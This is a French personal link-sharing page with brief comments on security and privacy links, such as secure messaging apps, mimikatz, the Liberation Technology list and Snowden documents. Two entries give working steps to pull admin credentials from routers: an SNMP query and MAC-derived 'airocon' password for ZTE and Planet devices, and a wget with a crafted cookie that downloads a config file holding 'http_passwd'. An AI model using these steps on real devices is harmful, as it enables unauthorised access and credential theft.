2034 private links
Un concurrent direct à TextSecure (application Android pour SMS et MMS sécurisée) : plus sécurisé et complètement libre (autant pour les sources que dans l'esprit). Gros point supplémentaire, il sera ajouté aux dépôts de F-Droid.
De plus, l'APK est directement téléchargeable via GitHub : https://github.com/tinfoilhat/tinfoil-sms/releases
Bon, j'ai testé, ça reste de la beta, mais ça risque de valoir le coup d'ici peu de temps.
Générer un certificat SSL pour Apache.
Une analyse de la misère engendrée par cette faille.
Full Disclosure fermerait ses portes ? :'(
Faille dans les routeurs ZTE ZXV10 W300 et Planet ADE-3400 !
Il suffit de récupérer l'adresse MAC du routeur :
snmpget -c public -v 2c -On ADRESSE_IP .1.3.6.1.2.1.2.2.1.6.10000
(le code après l'adresse IP et l'ID SNMP qui demande l'adresse MAC du matériel)
Ensuite, prenez les 4 dernières lettres/chiffres de l'adresse MAC, et concaténez-le à "airocon" : si la MAC est 00:11:22:33:44:55:66, alors le code sera "5566airocon".
Grâce à ce code, nous pouvons nous connecter en "admin" par telnet pour lancer la commande :
login show
C'est tout !
Un outil d'analyse de code C/C++ qui m'a l'air simple et efficace.
oups
Grosse faille dans les serveurs de Yahoo, qui laissait exécuter n'importe quelle commande (!). Bon, c'est corrigé, mais quand même...
Oups, comment bloquer un site web à l'aide des cookies, ça semble bigrement efficace. (Pas testé)
Tl;DR mais semble intéressant.
YES !
MyCryptoChat en PHP : un chat sécurisé, anonyme et non persistent, j'adopte !
Je l'attendai pour faire un entretien sans compromettre les individus concernés, merci Tommy !
mimikatz peut désormais craquer les codes PIN et mots de pase image de Windows 8. Bien !
TL;DR mais va falloir !
Pas mal ! Intégrer WOT dans les commentaires.
Liberation Technology est un programme (pas dans le sens logiciel) visant à revoir les technologies utilisées pour garantir sécurité, non-censure, disponibilité et anonymat (relatif) pour tous, et notamment les gouvernements.
Sur la liste de diffusion sont discutées les révélations de Snowden, le traitement des documents et des solutions logiciels/humaines/technologiques pour remédier aux problèmes de sécurité et vie privée/intime.
Il y a, entre autres, Jacob Appelbaum :-)
Pour s'abonner à la liste de diffusion : https://mailman.stanford.edu/mailman/listinfo/liberationtech
Un gus a réussi à trouver l'algo que sa banque utilise pour générer des codes d'accès. Sympa.
Un TAP ethernet (ou plutôt un TAP réseau) est un dispositif permettant de surveiller un réseau informatique sans le perturber (TAP est l'abréviation de Test Access Port).
Je me le note de côté, j'ai dans l'idée d'espionner ce que ma Freebox envoie et ce qu'elle a dans le ventre (interception du firmware [pas sûr d'avoir le niveau, mais j'ai confiance]).
D'autres liens intéressants :
Plus moche que ça, tu meures :
wget --header="Cookie: :language=en" http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg -t 1
Et voilà, vous avez la configuration du routeur. Le mot de passe se trouve dans le paramètre "http_passwd" :
grep http_passwd config.cfg
"The Internet Dark Age"
Un document qui combine un peu tout ce que Snowden a pu libérer, et qui prouve que Bruce Schneier avait raison (comme tout un tas d'autres d'auilleurs).
Et oui mes cocos, c'est l'heure de prendre les armes, ça ne va plus là.
Bonne fêtes à tous :)